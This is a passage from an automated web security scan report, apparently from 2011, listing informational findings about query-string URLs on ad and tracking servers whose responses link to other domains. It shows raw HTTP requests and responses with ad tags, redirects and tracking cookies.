Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:38 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 11295

truste.ca.addClearAdIcon=function(c){var d="te-clearads-js";if(!truste.ca[c.baseName+"_bi"]){truste.ca[c.baseName+"_bi"]=c
}var a=document.getElementById(c.containerId);if(!a){var e=document.getElemen
...[SNIP]...
</span>';
var f='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash4/cabs/swflash.cab#version=4,0,0,0" id="tecafi" width="77" height="16" style="position: relative"><param name="flashVars" value="bindingId='+k.baseName+'_bi"/>
...[SNIP]...

15.21. http://choices.truste.com/ca

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:34 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3759

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
<hr />\n <a href="http://bit.ly/dKnbdp" target="_blank">Online Privacy Library &raquo;</a>
...[SNIP]...
<hr />\n <a href="http://bit.ly/ffdQkR" target="_blank">AT&amp;T Privacy FAQ &raquo;</b>
...[SNIP]...

15.22. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:05 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&amp;pid=18&amp;uid=CAESEA4m3NbIVFSubIriNyJB6xg&amp;cver=1">here</A>
...[SNIP]...

15.23. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:44 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&amp;cver=1">here</A>
...[SNIP]...

15.24. http://gannett.gcion.com/addyn/3.0/5111.1/896067/0/-1/ADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/896067/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /addyn/3.0/5111.1/896067/0/-1/ADTECH;alias=fl-brevard.flatoday.com/news/article.htm_88x31_1;cookie=info;loc=100;target=_blank;grp=24711;misc=1304949608179;size=88x31;noperf=1;key=Highly+publicized+murder+Caylee+Anthony+rivets+enrages;kvcw=;kvtitle=Highly-publicized-murder-of-Caylee-Anthony-rivets%2C-enrages HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slwalgreens=true; rsi_segs=D08734_70008|D08734_72078; CfP=1; JEB2=4DC7E58B6E651A440C6EAF39F000181A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 513

document.write('<a href="http://gannett.gcion.com/?adlink/5111/169190/0/13/AdId=516875;BnId=3;itime=949616572;key=Highly+publicized+murder+Caylee+Anthony+rivets+enrages;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/267/Ad516875St1Sz13Sq20046904V0Id3.gif" border=0 alt=" " width="88" height="31"></a>
...[SNIP]...

15.25. http://ib.adnxs.com/ab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ab?enc=zszMzMzM_D_5U-Olm8T4PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAAcC4a9AAAAAA.&tt_code=4455744&udj=uf%28%27a%27%2C+10005%2C+1304949637%29%3Buf%28%27c%27%2C+47078%2C+1304949637%29%3Buf%28%27r%27%2C+327251%2C+1304949637%29%3Bppv%289163%2C+%274297476271584241789%27%2C+1304949637%2C+1305122437%2C+47078%2C+49165%29%3B&cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQC&referrer=http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8&pp=1.30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:00:24 GMT
Content-Length: 1491

document.write('<a href="http://ib.adnxs.com/click/DPqCvqAv-D_NzMzMzMz0PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BA
...[SNIP]...
</a><img src="http://xcdn.xgraph.net/17572/ae/xg.gif?type=ae&ais=ApN&pid=17572&cid=H26G&n_cid=47078&crid=300x250_8F_Interim_finalgif&n_crid=327251&mpm=CPM&n_g=u&n_a=0&aids=H26G-8&n_price=1.511628&n_bust=1304949616&n=http%3A%2F%2Fdata.cmcore.com%2Fimp%3Ftid%3D17%26ci%3D90074784%26vn1%3D4.1.1%26vn2%3De4.0%26ec%3DUTF-8%26cm_mmc%3DIM_Display-_-x-_-x15off-_-postvday%26cm_mmca1%3D300x250%26cm_mmca2%3D300x250_8F_Interim_finalgif%26cm_mmca3%3Dpostvday%26cm_mmca4%3D25K" width="1" height="1"/><img src="http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/2724386019227846218/gif?meta=appNexus" width="1" height="1"/>');

15.26. http://ib.adnxs.com/if

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /if?enc=XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAgMCAAUAAAAAOCNlQgAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949676%29%3Buf%28%27r%27%2C+184995%2C+1304949676%29%3B&cnd=!Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; sess=1; uuid2=2724386019227846218; icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:01:25 GMT
Content-Length: 530

<script language="JavaScript" src="http://mf.sitescout.com/tag.jsp?pid=0C66F16&w=728&h=90&rnd=1304949683&cm=http://ib.adnxs.com/click/XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAQMCAAUAAAAANyNUQgAAAAA./cnd=!Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc="></script>

15.27. http://ib.adnxs.com/if

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; sess=1; uuid2=2724386019227846218; icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATCm55_uBBCm55_uBBgB

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:03:50 GMT
Content-Length: 530

<script language="JavaScript" src="http://mf.sitescout.com/tag.jsp?pid=0C66F16&w=728&h=90&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc="></script>

15.28. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /ptj?member=311&inv_code=cm.tribune&size=300x600&imp_id=cm-87971011_1304949578,11f8f328940989e&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.tribune%2Fuscell_ldev_300x600_05311%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.{PRICEBUCKET}-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D5044004%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
